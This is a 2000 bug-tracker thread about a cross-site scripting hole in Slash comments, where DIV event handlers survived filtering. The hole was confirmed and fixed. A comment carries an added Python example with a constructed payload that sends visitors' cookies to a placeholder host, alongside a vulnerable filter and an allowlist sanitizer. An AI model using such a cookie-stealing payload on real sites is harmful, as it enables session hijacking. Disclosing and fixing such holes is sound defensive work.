#21 JavaScript Injection - Security Hole

Status: closed-fixed
Priority: 9
Updated: 2000-05-01
Created: 2000-04-27
Private: No

Test Case: http://beta.slashdot.org/comments.pl?sid=00/04/27/1429226&cid=418

(erm, does this accept HTML? In case not, I'll just start again.)

Test Case: http://beta.slashdot.org/comments.pl?sid=00/04/27/1429226&cid=418

JavaScript can be injected into comments using <DIV ONMOUSEOVER="...">. The user does have to pass his mouse over your comment, but that's hardly an uncommon thing, especially if you make the comment a large first post...

My demo just displays the cookie, but setting it to open "http://some.host/some.script?cookie=<foo>", and storing a list of users' cookies, would be trivial.

Discussion

  • Anonymous

    Anonymous - 2000-04-27

    (I guess this doesn't support HTML.. slashdot spoils me :)

    OK. Since I was bored, and had basically nothing else to do, I improved my test case slightly.

    <P .*?> and <DIV .*?> are both accepted by Slash. I've not tested <P> for javascript hooks, but at least <DIV> supports ONMOUSEOVER, ONMOUSEOUT, ONMOUSEMOVE, etc.
    The only 'valid' parameter for <DIV> is ALIGN.. so either stripping <DIV> support entirely, or only allowing <DIV ALIGN="(?:left|right|center)"> would defeat *this* hole -- there may be other possible points to stuff javascript into Slash and get exactly the same effect (using IE, at least, I haven't tested netscape -- anyone?)
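
    An added example (not part of this thread and not Slash's own code) that puts the two halves of the discussion above side by side: a payload of the kind the report describes, an assumed reconstruction of a filter that keeps any <P .*?> or <DIV .*?> tag verbatim, and the allowlist this comment proposes (DIV with ALIGN restricted to left/right/center), implemented on top of Python's html.parser. The payload text, the permissive filter, and the choice to also allow ALIGN on P are assumptions; some.host/some.script is the placeholder from the report.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed payload in the spirit of the report (the reporter's own demo on
# beta.slashdot.org is not reproduced here): a DIV whose mouseover handler
# opens the attacker's collection URL with the victim's cookies appended.
PAYLOAD = (
    '<DIV ALIGN="center" '
    "ONMOUSEOVER=\"window.open('http://some.host/some.script?cookie=' + escape(document.cookie))\">"
    "First post!</DIV>"
)

# --- The weak filter ------------------------------------------------------
# Assumed reconstruction of the behaviour the thread describes, not Slash's
# actual code: any <P ...> or <DIV ...> tag is kept verbatim, attributes and
# all, while other tags are stripped. The event-handler attribute survives.
TAG_RE = re.compile(r"<(/?)(\w+)[^>]*>", re.IGNORECASE)


def permissive_filter(text):
    def keep_or_drop(match):
        return match.group(0) if match.group(2).lower() in ("p", "div") else ""
    return TAG_RE.sub(keep_or_drop, text)


# --- The hardened filter --------------------------------------------------
# Allowlist of tags and, per tag, of attributes with a value pattern. Only
# ALIGN is permitted (on DIV as the comment proposes; on P by assumption),
# and only with the three listed values. Everything else, ONMOUSEOVER
# included, is dropped rather than passed through.
ALIGN_RE = re.compile(r"^(?:left|right|center)$", re.IGNORECASE)
ALLOWED = {"p": {"align": ALIGN_RE}, "div": {"align": ALIGN_RE}}


class CommentSanitizer(HTMLParser):
    """Rebuilds the comment from parsed tokens instead of passing raw tags
    through, so only allowlisted tags/attributes can reach the output and
    all text content is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []  # allowlisted tags still open, for auto-closing

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tag dropped; its text still flows through handle_data
        safe = []
        for name, value in attrs:
            pattern = ALLOWED[tag].get(name)
            if pattern is None or value is None or not pattern.match(value):
                continue  # unlisted attribute or unexpected value: dropped
            safe.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return  # stray or disallowed close tag: ignored
        while self.open_tags:  # close inner tags too, to keep the output well-formed
            inner = self.open_tags.pop()
            self.out.append(f"</{inner}>")
            if inner == tag:
                break

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

    def result(self):
        while self.open_tags:  # close anything the commenter left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_comment(text):
    parser = CommentSanitizer()
    parser.feed(text)
    parser.close()
    return parser.result()


def has_event_handler(text):
    """Rough check for the demonstration only: does any on*= attribute survive?"""
    return re.search(r"\bon\w+\s*=", text, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("permissive:", permissive_filter(PAYLOAD))
    print("sanitized: ", sanitize_comment(PAYLOAD))
```

    The design point is the one the comment makes: a filter that recognises a tag name and then copies the tag verbatim has no say over its attributes, so any event handler rides along. Rebuilding the markup from an allowlist of tags and attribute values means ONMOUSEOVER (or any attribute you did not think of) never reaches the page, and dropped tags still leave their text behind as escaped content.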

     
  • Chris Nandor

    Chris Nandor - 2000-04-29

    Known, and fixing. These "exploits" work with IE, not with Netscape, apparently. Slashdot has said for some time you could use P .* and DIV .* tags, but this was not true. I made it true on the beta site, opening up the door to these things. I'll close that door soon. :-)

     
  • Chris Nandor

    Chris Nandor - 2000-04-29
    • priority: 5 --> 9
    • assigned_to: nobody --> pudge
     
  • Chris Nandor

    Chris Nandor - 2000-05-01

    Alrighty, fixed. Thanks.

     
  • Chris Nandor

    Chris Nandor - 2000-05-01
    • status: open --> closed-fixed
     
